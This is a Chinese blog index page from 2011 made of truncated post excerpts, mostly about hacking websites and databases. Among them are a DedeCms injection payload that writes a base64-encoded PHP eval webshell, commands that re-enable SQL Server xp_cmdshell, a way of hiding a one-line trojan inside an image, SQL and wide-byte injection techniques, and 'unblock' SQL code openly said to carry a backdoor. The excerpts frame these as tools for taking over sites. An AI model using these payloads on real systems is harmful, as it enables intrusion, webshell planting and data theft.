- 博客(26)
- 资源 (22)
- 收藏
- 关注
原创 Linux Kernel 'mpt2sas' Local Privilege Escalation and Information Disclosure Vulnerabilitie
Bugtraq ID: 47185 Class: Boundary Condition Error CVE: Remote: No Local: Yes Published: Apr 06 2011 12:00AM Updated: Apr 06 2011 12:00AM Credit: Dan Rosenberg Vulnerable: Linux kernel 2.6.38 Linux kernel 2.6.37 Linux kernel 2.6.37 Linux kernel 2.6.36 Linux
2011-04-29 01:50:00 1371
转载 LiteSpeed Web Server 4.0.17 w/ PHP Remote Exploit for FreeBSD
<br />备份存档..<br /># LiteSpeed Web Server 4.0.17 w/ PHP Remote Exploit for FreeBSD# bug discovered & exploited by Kingcope## Dec 2010# Lame Xploit Tested with success on# FreeBSD 8.0-RELEASE - LiteSpeed WebServer 4.0.17 Standard & Enterprise x86
2011-04-29 01:49:00 865
转载 通杀IIS7.0畸形解析0day漏洞(类似Nginx那个0day)
在群里看见许多大牛在周杰伦官方留页面一群小菜四处宣传,实在没必要渗透方法其实和网上并没有区别大家可以网上看看通杀IIS7.0畸形解析0day漏洞先合并一张PHP一句话图片马,合并方法:①、DOS合并:copy 1.gif /b + 1.txt/a asp.gif②、用edjpgcom,进行图片和一句话木马的合并,图片随便找一张.【
2011-04-28 14:09:00 1940 1
原创 VB键码常数对照表
<br />键码常数 值 描述 <br /> vbKeyLButton 1 鼠标左键 <br /> vbKeyRButton 2 鼠标右键 <br /> vbKeyCancel 3 CANCEL 键 <br /> vbKeyMButton 4 鼠标中键 <br /> vbKeyBack 8 BACKSPACE 键 <br /> vbKeyTab 9 TAB 键 <br /
2011-04-25 16:26:00 1455
转载 怎样去掉VB窗体上的图标
Option ExplicitPrivate Declare Function SendMessage Lib "user32" Alias "SendMessageA" (ByVal hwnd As Long, ByVal wMsg As Long, ByVal wParam As Long, lParam As Any) As LongPrivate Const WM_SETICON = &H80Private Const ICON_SMALL = 0Private Const ICON
2011-04-25 15:21:00 1309
转载 DedeCms v5.6 嵌入恶意代码执行漏洞
在上传软件的地方,对本地地址没有进行有效的验证,可以被恶意利用注册会员,上传软件:本地地址中填入a{/dede:link}{dede:toby57 name/="']=0;phpinfo();//"}x{/dede:toby57},发表后查看或修改即可执行a{/dede:link}{dede:toby57 name/="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz
2011-04-25 14:23:00 1181
转载 DEDECMS任意修改文章漏洞 附EXP
<br />这个漏洞不足以得到马儿 但能修改任何文章 也算是一个严重的漏洞!<br />废话不说 <br />经典对白 看代码!<br />member/soft_edit.php<br /> <br />if(empty($dopost)) //如果这里是空也就是直接访问这个文件{ //读取归档信息 $arcQuery = "Select #@__channeltype.typename as channelname, #@__arcrank
2011-04-25 14:21:00 927
转载 phpcms V9 BLind SQL Injection Vulnerability
<br />=================================================================<br /> phpcms V9 BLind SQL Injection Vulnerability<br />=================================================================<br /><br />Software: phpcms V9<br />Vendor: www.
2011-04-25 14:18:00 1037
原创 DISCUZX1.5 本地文件包含
<br />DISCUZX1.5 本地文件包含,当然是有条件的,就是使用文件作为缓存。<br /><br />config_global.php<br />$_config['cache']['type'] = ‘file’;<br /><br />function cachedata($cachenames) {<br />……<br />$isfilecache = getglobal(‘config/cache/type’) == ‘file’;<br />……<br />if($isfi
2011-04-25 14:12:00 610
原创 一种被忽视的攻击方式-padding oracle
<br />之前搞一个目标站的时候用WVS扫描,出现”asp.net padding oracle ”这么一条高危漏洞,由于之前没听说过,便到网上查了一下资料。这技术其实是去年被发现的,还有一个称呼是ms10-070,不过目前国内研究的人好像还不多,查到的资料几乎都是国外的,其实这技术的危害性还是很巨大的,就拿针对asp.net来说,可以读出web.config等一些敏感文件的内容,具体原理大家可以去<br />http://www.gdssecurity.com/l/b/2 ... cks-with-pa
2011-04-25 14:10:00 1030
转载 SQL高级注入使用之储存过程
<br />sql2005恢复xp_cmdshell<br />EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;<br />关闭:EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;<br />零
2011-04-25 14:05:00 1010
转载 1433口令提权的详细过程
<br />下面来说sa下执行命令错误的几种情况:<br /><br />1、 无法装载DLL xpsql70.dll或该DLL所引用的某一DLL。原因126(找不到指定模块。)<br /><br />这种情况比较常见的,修复起来说简单也简单,但是有条件的。这种情况要是能列出目录(用sqltools v2.0就有列目录功能)恭喜你这个有80%的情况能修复了,如果能列目录,那么只要找到xplog70.dll的路径执行以下命令就可以了。<br />第一步<br />exec sp_dropexte
2011-04-25 14:02:00 1429
转载 Discuz!后台怎么拿到Webshell
趁着地球还没毁灭,赶紧放出来。预祝"单恋一枝花"童鞋生日快乐。恭喜我的浩方Dota升到2级。希望世界和平。我不是标题党,你们敢踩我。敢踩我。。踩我。。。我……既然还没跪,我就从Discuz!古老的6.0版本开始,漏洞都出现在扩展插件上,利用方式有所不同,下面开始。一 Discuz! 6.0 和 Discuz! 7.0既然要后台拿Shell,文件写入必看。
2011-04-25 13:56:00 2222
原创 牧星 php 网站信息管理系统 0day
<br /><br />一个小程序在拿站是发现了这个程序,于是跨过去看了下源码。悲剧就发生了!<br /><br />admin/login.php 源码:<br /><?phpsession_start(); include "../include/databaseConfig.inc.php";$admin = $_POST['admin']; $pass = md5($_POST['pass']);$codes = $_POST['codes']; if($_
2011-04-25 13:42:00 950
转载 Dawei 团购 变量未初值化
01if($cateid)02{03 $container.=' and grouptype="'.$cateid.'"';04}05if($cityid)06{07 $container.=' and cityid="'.$cityid.'"';08}09 10$order=" order by recommend desc,sortorder desc";11$sql="select * from ".tname('groups')." where 1".$container
2011-04-25 13:39:00 1187
原创 dircms宽字节注入漏洞
//------------------------------------Name: dircmsSite: www.dircms.netDesc: 宽字节带来的注入问题Author: tojen (tojen.me at gmail.com)Date: 2010/3/8//--------------------------------------描述:无意间黑盒发现dircms存在宽字节带来的注入问题,虽然流行过一段时间,貌似现在人们都不太关注这个问题。测试了下发现有俩个地方存在问题:1.http:/
2011-04-25 13:39:00 1238
转载 蓝海豚团购系统上传.包含.读取文件漏洞
经典对白看代码...controls/user.class.php 客户操作类01function addgroup_action() //index.php?con=user&act=addgroup02 {03 if(!$GLOBALS['session']->get('uid')) //验证是否登录user04 {05 sheader(url('user','login')
2011-04-25 13:37:00 1662
转载 sql解封代码(有后门,自行清除)
if(@@version like 'Microsoft SQL Server 2000%')use master;elseexec sp_configure 'Ole Automation Procedures', 1;RECONFIGURE WITH OVERRIDE;gocreate procedure dbo.sp_dropextendedproc @functname nvarchar(517) -- name of function as -- If we're in a transactio
2011-04-25 12:08:00 1285
原创 mssql exec xp_cmdshell 调用'CreateProcess'失败解决办法
<br /><br />mssql 数据库注入时 exec xp_cmdshell 调用 'CreateProcess' 失败的解决办法。<br /> 微软ms sql 2000/2005 注入时exec xp_cmdshell 调用 'CreateProcess' 失败,错误代码: '5',两种解决办法。<br /> 原因不说了,一般都是cmd.exe被限制权限了,system用户没有权限,解决方法2种:<br />1、替换shift文件(在开启3389情况下):<br /> 下面两条语
2011-04-25 12:00:00 6381 1
转载 PHP程序的常见漏洞攻击分析
<br /><br />不是固若金汤,随着PHP的广泛运用,一些黑客们也在无时不想找PHP的麻烦,通过PHP程序漏洞进行攻击就是其中一种。这里,我们将从全局变量,远程文件,文<br />件上载,库文件,Session文件,数据类型和容易出错的函数这几个方面分析了PHP的安全性。<br />如何通过全局变量进行攻击?<br />PHP中的变量不需要事先声明,它们会在第一次使用时自动创建,它们的类型根据上下文环境自动确定。从程序员的角度来看,这无疑是一种极其方便的处理方法<br />。一旦一个变量被创建了,就可
2011-04-24 22:32:00 675
原创 PHP程序的常见漏洞攻击分析
<br /><br />不是固若金汤,随着PHP的广泛运用,一些黑客们也在无时不想找PHP的麻烦,通过PHP程序漏洞进行攻击就是其中一种。这里,我们将从全局变量,远程文件,文<br />件上载,库文件,Session文件,数据类型和容易出错的函数这几个方面分析了PHP的安全性。<br />如何通过全局变量进行攻击?<br />PHP中的变量不需要事先声明,它们会在第一次使用时自动创建,它们的类型根据上下文环境自动确定。从程序员的角度来看,这无疑是一种极其方便的处理方法<br />。一旦一个变量被创建了,就可
2011-04-24 22:31:00 608
原创 Exploit 编写系列教程 1-10合集
<br />下载地址1:http://bbs.pediy.com/showthread.php?p=879337下载地址2: http://u.115.com/file/f428224d99下载地址3:http://www.vdisk.cn/down/index/5217288A2787目录译序………………………………………………………………..2<br />Exploit 编写系列教程第一篇:栈溢出……………………………………..3<br />Exploit 编写系列教程第二篇:跳至ShellCode……
2011-04-24 22:29:00 2023
原创 XSS(跨站脚本攻击) 逃避过滤
<br />XSS(跨站脚本攻击) 备忘录<br />逃避过滤<br />出处:http://ha.ckers.org/xss.html<br />作者:RSnake<br />翻译:帝释天<br /><br />如果你不知道如何进行XSS攻击,那么本文或许对你没有任何帮助。这里主要针对已经对基本的XSS攻击有所了解而想更加深入地理解关于绕过过滤的细节问题的读者。文中不会告诉你如何降低XSS的影响或者怎么去编写一些实际的攻击代码。你可以简单的得到一些最基本的方法来推测剩余的部分。<br />(介绍部分略,太
2011-04-24 22:28:00 2195
原创 SQL高级注入使用之储存过程
<br /> =====================================<br /> =====SQL高级注入使用之储存过程 ====== <br /> =====================================<br /><br /><br />转载注来自:http://itpro.blog.163.com <br />本人前几年整理的,后来一朋友要传给他了,我也贴出来供大家研究使用。<br />--
2011-04-24 22:08:00 1700
转载 about utf7-BOM string injection
<br /><br />about utf7-BOM string injection <br /><br />在一次和大牛Mario Heiderich的交流中,他问我知不知道“+/v8”,那时候我对这个一无所知,于是他就发我大牛Gareth Heyes'的一paper《XSS Lightsabre techniques》,在ppt的34页里:<br /><br />CSS expressions with UTF-7<br />• UTF-7 BOM character can force UTF-7
2011-04-24 22:05:00 1023
转载 宽字节(宽字符)注入
宽字节注入也是在最近的项目中发现的问题,大家都知道%df’ 被PHP转义(开启GPC、用addslashes函数,或者icov等),单引号被加上反斜杠/,变成了 %df/’,其中/的十六进制是 %5C ,那么现在 %df/’ = %df%5c%27,如果程序的默认字符集是GBK等宽字节字符集,则MYSQL用GBK的编码时,会认为 %df%5c 是一个宽字符,也就是縗’,也就是说:%df/’ = %df%5c%27=縗’,有了单引号就好注入了。比如:$conn = mysql_connect(”localho
2011-04-24 22:04:00 1974
hydra 7.2 win32
2012-04-09
用Python做科学计算
2012-04-04
pyloris-3.2-win32
2012-03-17
PHP Fuzzing行动——源码审计
2012-02-06
类似IE的VC编写浏览器
2012-01-28
Using_XSS_to_bypass_CSRF_protection
2012-01-28
C语言难点及分析.
2012-01-28
向其他进程注入代码的三种方法
2012-01-28
网站安全漏洞的产生分析、处理总结
2011-04-21
VC学习大纲 VC学习讲义
2009-06-09
The Analysis Of Basic MFC Program Running Principle
2008-12-29
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人